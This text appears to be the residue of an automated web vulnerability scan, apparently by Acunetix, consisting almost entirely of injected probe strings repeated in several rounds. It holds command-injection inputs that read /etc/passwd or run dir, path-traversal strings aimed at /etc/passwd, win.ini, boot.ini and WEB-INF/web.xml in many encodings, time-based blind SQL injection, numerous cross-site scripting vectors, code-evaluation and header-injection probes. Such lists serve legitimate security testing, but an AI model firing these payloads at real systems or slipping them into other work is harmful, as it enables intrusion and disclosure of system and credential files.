SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9393487*9757303)+"

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(933326)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(994080)>

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img/src=">" onerror=alert(958607)>

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

${100077+100023}

1<ScRiPt%20>prompt(962619)</sCripT>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

1

1&lt

-1))

1

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n958571=v936319

)

1

\xf6<img acu onmouseover=prompt(936683) //\xf6>

1

ozLHGO9G'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

1

testasp.vulnweb.com

1<input autofocus onfocus=prompt(964153)>

AI7t3Zul')

1

"|"ld

/etc/passwd

1

jBCUH4LE'))

<a href='http://www.acunetix.com'>website security</a>

1

^(#$!@#$)(()))******

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

[url=http://www.acunetix.com]website security[/url]

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

"

'

1_2bdxJ <ScRiPt >prompt(944586)</ScRiPt>

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

"

http://hitKMtXOI4Q6o.bxss.me/

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

MdKUX1HV'

||cat /etc/passwd

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

http://www.acunetix.tst

1

1

LUVD66ZN')

1

1

&dir

file:///etc/passwd

comments

1

'"

1

1

ENd01I6X'))

1'"()&%<ScRiPt >prompt(953359)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

comments/.

1

WEB-INF/web.xml

<!--

1

1

'"()&%<ScRiPt >prompt(983601)</ScRiPt>

1

"&dir&"

1

1

WEB-INF\web.xml

1

1_985118

1

1

1

1

../../../../../../../../../../windows/win.ini

|dir

1

1

1

acu4347\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4347

../../../../../../../../../../boot.ini

1

'|dir

1

1

1

acux7779\xc0\xbez1\xc0\xbcz2a\x90bcxuca7779

../../../../../../../../../../windows/win.ini.jpg

1

1

1

"|dir

1<ScRiPt >prompt(954337)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(920011)</script>

1

1

1

................windowswin.ini

1<ScRiPt >prompt(916392)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942209></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(912788)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(922279)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944365)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9212772*9056803)

1<div style=width:expression(prompt(986107))>

1

&cat /etc/passwd&

1

'+response.write(9212772*9056803)+'

1<iframe src='data:text/html

1

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

"+response.write(9212772*9056803)+"

1

1<body onload=prompt(922694)>

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(928053)>

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<img src=xyz OnErRor=prompt(950116)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

1

1

1<img/src=">" onerror=alert(913494)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

${99954+99751}

1

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(994393)</sCripT>

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1

1&n972200=v980400

1&lt

1

-1)

)

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

\xf6<img acu onmouseover=prompt(942836) //\xf6>

'|'ld

-1))

1

1

!(()&&!|*|*|

1

'"()

1<input autofocus onfocus=prompt(951989)>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

GryKD2ZQ'

1

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

testasp.vulnweb.com

1

'

1

1

[url=http://www.acunetix.com]website security[/url]

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

GoPU57jR')

1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1_qyH0D <ScRiPt >prompt(925180)</ScRiPt>

'

lTOi7B5W'))

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

"

1

1

-1

${@print(md5(acunetix_wvs_security_test))}\

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://hitOJkwnqMhXI.bxss.me/

1

-1)

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

1

-1))

comments

1

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

comments

'"

VK40yE64'

1

'&dir&'

1

1'"()&%<ScRiPt >prompt(962388)</ScRiPt>

1

comments/.

1

<!--

G2KNCdWL')

1

"&dir&"

file:///etc/passwd

'"()&%<ScRiPt >prompt(951824)</ScRiPt>

1

1

/\../\../\../\../\../\../\../etc/passwd

1

LZENK4Ke'))

|dir

1

1

1

1

WEB-INF/web.xml

1

1_955482

'|dir

1

1

WEB-INF\web.xml

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

acu9250\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9250

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux4817\xc0\xbez1\xc0\xbcz2a\x90bcxuca4817

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(909172)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(908024)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(918364)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954068></ScRiPt>

1

1

1<ScRiPt >prompt(976053)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(933304)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(921315)"></g></svg>

1

1

response.write(9025564*9257958)

1<div style=width:expression(prompt(902899))>

1

1

1<iframe src='data:text/html

'+response.write(9025564*9257958)+'

1

1

"+response.write(9025564*9257958)+"

&cat /etc/passwd&

1<body onload=prompt(944094)>

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(927297)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

"&cat /etc/passwd&"